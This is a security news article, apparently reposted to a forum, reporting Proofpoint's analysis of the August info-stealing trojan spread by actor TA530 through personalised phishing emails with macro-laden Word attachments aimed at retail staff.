- Oct 23, 2012
- 12,527
A fresh information-stealing trojan dubbed August is making the rounds, targeting credentials and sensitive documents from highly targeted victims through socially engineered emails with attached malicious documents.
According to analysis from Proofpoint, August is the payload in multiple campaigns from TA530—an actor known for targeting customer service and managerial staff at retailers.
“These campaigns utilized ‘fileless’ loading of a relatively new malware called August through the use of Word macros and PowerShell,” the researchers said. “We found that many of the lures and subject lines of the emails used references to issues with supposed purchases on the company’s website, and were targeted at individuals who may be able to provide support for those issues. The lures also suggested that the attached document contained detailed information about the issue.”
According to analysis from Proofpoint, August is the payload in multiple campaigns from TA530—an actor known for targeting customer service and managerial staff at retailers.
“These campaigns utilized ‘fileless’ loading of a relatively new malware called August through the use of Word macros and PowerShell,” the researchers said. “We found that many of the lures and subject lines of the emails used references to issues with supposed purchases on the company’s website, and were targeted at individuals who may be able to provide support for those issues. The lures also suggested that the attached document contained detailed information about the issue.”
In an example of targeting, the subject lines were personalized with the recipient's domain. Examples included: Erroneous charges from [recipient’s domain]; [recipient’s domain]—Help: Items vanish from the cart before checkout; and need help with order on [recipient’s domain].
However, the attached documents of course contain macros that could download and install August. And once installed, the info-stealer sets about harvesting a raft of details, including stealing crypto-currency wallets, FTP credentials, messenger and RDP credentials, wallet files, and cookies and passwords from Firefox, Chrome, Thunderbird and Outlook.
It also determines the presence of security tools, and doesn’t communicate with the C&C if they are found.
“While this actor is largely targeting retailers and manufacturers with large B2C sales operations, August could be used to steal credentials and files in a wide range of scenarios,” Proofpoint researchers concluded. “The malware itself is obfuscated, while the macro used in these distribution campaigns employs a number of evasion techniques and a fileless approach to load the malware via PowerShell. All of these factors increase the difficulty of detection, both at the gateway and the endpoint. As email lures become increasingly sophisticated and personalized, organizations need to rely more heavily on email gateways capable of detecting macros with sandbox evasion built in as well as user education that addresses emails that do not initially look suspicious.”